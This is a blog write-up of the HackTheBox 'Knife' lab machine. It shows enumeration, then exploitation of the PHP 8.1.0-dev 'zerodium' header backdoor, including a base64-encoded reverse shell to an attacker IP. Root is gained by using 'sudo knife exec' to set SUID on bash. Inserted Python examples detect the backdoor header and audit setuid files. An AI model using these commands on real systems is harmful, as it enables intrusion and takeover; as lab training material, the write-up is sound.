HackTheBox - Knife

Summary

Knife was an easy Linux HackTheBox machine by MrKN16H. The initial foothold uses the recent compromise of the PHP git server, where someone committed a backdoor and tried to publish the backdoored PHP build; the web server runs that build, which gets us a shell. Later we see that the user can run the knife tool as root via sudo, which gets us root.

Initial Enumeration

nmap

# Nmap 7.91 scan initiated Sun May 23 16:39:37 2021 as: nmap -v -sC -sV -oN nmap/knife 10.129.110.168
Nmap scan report for 10.129.110.168
Host is up (0.61s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 23 16:39:59 2021 -- 1 IP address (1 host up) scanned in 22.11 seconds

We see only two ports open, 22 and 80, and from the SSH banner we know it is an Ubuntu box.

Let's start with web enumeration.

Web

We see a static site is present. Playing around with the extension we see that it is a PHP file.

Let's start gobuster and poke around the website manually in the meantime.

So I start gobuster with

gobuster dir  -b 403,404 -w "/opt/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt"  -u "http://10.129.110.168/" -x php -o knife.out

Checking the web source we don't see anything interesting, and gobuster was not showing anything interesting yet either.

Let's add knife.htb as a vhost and see if we get anything different, which results in nothing different.

Let's run vhost enumeration and see if we find anything.

gobuster vhost  -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt  -u http://knife.htb
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://knife.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/05/23 16:57:23 Starting gobuster in VHOST enumeration mode
===============================================================

which also got me nothing.

Back to manual enumeration, we see an interesting header: X-Powered-By: PHP/8.1.0-dev

$ curl -sSL -D - http://knife.htb -o /dev/null
HTTP/1.1 200 OK
Date: Sun, 23 May 2021 11:25:19 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

Seeing that, I remember reading an article about the PHP git server being compromised and a backdoor being committed.

Googling around we find an article.

The backdoor is really simple: the server executes the code in the User-Agentt: header if the value starts with zerodium.

We can prove that this is the vulnerable version with

curl -s -H 'User-Agentt: zerodiumsystem("whoami");' "http://knife.htb/index.php"  | head -2
james
<!DOCTYPE html>
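For the defender's side of the check above, here is an added example (not code from the original write-up) that classifies captured HTTP traffic: it flags responses advertising the backdoored PHP/8.1.0-dev build and requests carrying the misspelled User-Agentt header, marking those whose value starts with zerodium as trigger attempts. The header blocks it scans are constructed samples; one of them reproduces the probe shown above.

```python
# Added example (not from the original write-up): defender-side detection for
# the PHP 8.1.0-dev "zerodium" backdoor described above. Works on raw HTTP
# header blocks as a proxy, WAF or packet capture would hand them over.
# All sample requests below are constructed for the example.
from __future__ import annotations

BACKDOORED_BANNER = "php/8.1.0-dev"   # X-Powered-By value of the backdoored dev build
TRIGGER_HEADER = "user-agentt"        # the doubled 't' is what the backdoor checks
TRIGGER_PREFIX = "zerodium"           # value prefix that makes the server eval the rest


def parse_raw_headers(raw: str) -> dict[str, str]:
    """Turn a raw request or response header block into a {name: value} dict.

    Names are lower-cased because HTTP header names are case-insensitive;
    the first line (request line or status line) is skipped.
    """
    headers: dict[str, str] = {}
    for line in raw.strip().splitlines()[1:]:
        name, sep, value = line.partition(":")
        if not sep:          # not a header line (e.g. a stray blank line)
            continue
        headers[name.strip().lower()] = value.strip()
    return headers


def advertises_backdoored_php(response_headers: dict[str, str]) -> bool:
    """True if the response advertises the backdoored dev build (as in the curl -D output above)."""
    return response_headers.get("x-powered-by", "").strip().lower() == BACKDOORED_BANNER


def classify_request(request_headers: dict[str, str]) -> str:
    """Classify one request:
      'trigger'           - User-Agentt present and its value starts with zerodium
      'suspicious-header' - User-Agentt present without the prefix; no legitimate
                            client sends this misspelled header, so still alert on it
      'clean'             - header absent
    """
    value = request_headers.get(TRIGGER_HEADER)
    if value is None:
        return "clean"
    if value.lstrip().lower().startswith(TRIGGER_PREFIX):
        return "trigger"
    return "suspicious-header"


def scan_requests(raw_requests: list[str]) -> list[tuple[int, str]]:
    """Return (index, verdict) for every request that is not clean."""
    findings: list[tuple[int, str]] = []
    for i, raw in enumerate(raw_requests):
        verdict = classify_request(parse_raw_headers(raw))
        if verdict != "clean":
            findings.append((i, verdict))
    return findings


# Constructed samples: a normal browser request, the probe from the write-up,
# and a request that only carries the odd header.
SAMPLE_REQUESTS = [
    "GET /index.php HTTP/1.1\r\nHost: knife.htb\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET /index.php HTTP/1.1\r\nHost: knife.htb\r\nUser-Agentt: zerodiumsystem(\"whoami\");\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: knife.htb\r\nUser-Agentt: curl/7.68.0\r\n\r\n",
]

# The response headers the write-up captured with curl -D.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sun, 23 May 2021 11:25:19 GMT\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n\r\n"
)

if __name__ == "__main__":
    print("backdoored build advertised:", advertises_backdoored_php(parse_raw_headers(SAMPLE_RESPONSE)))
    for idx, verdict in scan_requests(SAMPLE_REQUESTS):
        print(f"request #{idx}: {verdict}")
```

The header-presence rule is deliberately broader than the prefix rule: the cheap, low-false-positive signal is that the header name User-Agentt never appears in legitimate traffic, so a WAF or log pipeline can alert on it regardless of the value.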

We can get a reverse shell using

curl -s -H 'User-Agentt: zerodiumsystem("echo L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk0LzQ0NDQgMD4mMSIK | base64 -d | bash");' "http://knife.htb/index.php"

and we get a reverse shell as james.

Privilege Escalation

Running sudo -l reveals

james@knife:/$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife

Let's run it and see what that application does.

sudo knife
ERROR: You need to pass a sub-command (e.g., knife SUB-COMMAND)

Usage: knife sub-command (options)
-s, --server-url URL Chef Infra Server URL.
--chef-zero-host HOST Host to start Chef Infra Zero on.
--chef-zero-port PORT Port (or port range) to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports until one works.
-k, --key KEY Chef Infra Server API client key.
--[no-]color Use colored output, defaults to enabled.
-c, --config CONFIG The configuration file to use.
--config-option OPTION=VALUE Override a single configuration option.
--defaults Accept default values for all questions.
-d, --disable-editing Do not open EDITOR, just accept the data as is.
-e, --editor EDITOR Set the editor to use for interactive commands.
-E, --environment ENVIRONMENT Set the Chef Infra Client environment (except for in searches, where this will be flagrantly ignored).
--[no-]fips Enable FIPS mode.
-F, --format FORMAT Which format to use for output. (valid options: 'summary', 'text', 'json', 'yaml', or 'pp')
--[no-]listen Whether a local mode (-z) server binds to a port.
-z, --local-mode Point knife commands at local repository instead of Chef Infra Server.
-u, --user USER Chef Infra Server API client username.
--print-after Show the data after a destructive operation.
--profile PROFILE The credentials profile to select.
-V, --verbose More verbose output. Use twice (-VV) for additional verbosity and three times (-VVV) for maximum verbosity.
-v, --version Show Chef Infra Client version.
-y, --yes Say yes to all prompts for confirmation.
-h, --help Show this help message.

Available subcommands: (for details, knife SUB-COMMAND --help)

** CHEF ORGANIZATION MANAGEMENT COMMANDS **
knife opc org create ORG_SHORT_NAME ORG_FULL_NAME (options)
knife opc org delete ORG_NAME
knife opc org edit ORG
knife opc org list
<SNIP>

With a little Google-fu we see the exec subcommand.

$ sudo knife exec
An interactive shell is opened

Type your script and do:

1. To run the script, use 'Ctrl D'
2. To exit, use 'Ctrl/Shift C'

Type here a script...
system('chmod +s /bin/bash')

Checking that we added SUID on bash:

james@knife:/opt/chef-workstation$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1183448 Jun 18 2020 /bin/bash
james@knife:/opt/chef-workstation$ /bin/bash -p
bash-5.0#
bash-5.0# whoami;hostname;date
root
knife
Sun May 23 12:08:30 UTC 2021
bash-5.0#

And we got a root shell. :man-with-bunny-ears-partying:
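The chmod +s /bin/bash step above is exactly the kind of artifact a host audit should catch. As an added example (not code from the original write-up), the script below walks a directory tree, collects every regular file with the setuid or setgid bit set, and reports the ones missing from an admin-maintained baseline. The baseline names are placeholders, and the fixture directory it builds (a fake /bin with passwd, bash and ls) is constructed so the check runs without touching the real system.

```python
# Added example (not from the original write-up): audit a directory tree for
# setuid/setgid files that are not on an admin-maintained baseline, which is
# how a defender notices the 'chmod +s /bin/bash' left behind above. The
# baseline names and the fixture directory below are constructed for the example.
import os
import stat
import tempfile

# Assumption: an admin keeps a per-host allow-list of programs that are
# legitimately setuid. These three are placeholders, not a complete list.
BASELINE_SETUID = {"passwd", "su", "sudo"}


def find_setuid_files(root: str) -> set[str]:
    """Walk `root` and return the root-relative paths of regular files that
    carry the setuid or setgid bit. Symlinks are not followed (lstat), so a
    link pointing at a setuid target is not double-counted."""
    hits: set[str] = set()
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:          # vanished or unreadable: skip, don't abort the audit
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.add(os.path.relpath(path, root))
    return hits


def unexpected_setuid(root: str, baseline: set[str]) -> set[str]:
    """Setuid/setgid files under `root` that the baseline does not account for."""
    return find_setuid_files(root) - baseline


def build_fixture() -> str:
    """Constructed fixture: a temp dir standing in for /bin with one expected
    setuid program (passwd), one unexpected one (bash, as on the box) and a
    plain 0755 binary (ls). Returns the directory path."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    for name, mode in (("passwd", 0o4755), ("bash", 0o4755), ("ls", 0o755)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")   # content is irrelevant; only the mode bits matter
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    fixture = build_fixture()
    print("all setuid/setgid:", sorted(find_setuid_files(fixture)))
    print("not in baseline:  ", sorted(unexpected_setuid(fixture, BASELINE_SETUID)))
    # On a real host the call would be unexpected_setuid("/usr/bin", BASELINE_SETUID)
    # with a baseline recorded from a known-good image.
```

Run periodically (or from a file-integrity job) against /bin, /usr/bin and /usr/sbin with a baseline captured from a clean image; any new entry such as bash is worth an immediate look, because a setuid shell is both the persistence and the privilege escalation in one file.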

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/knife/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.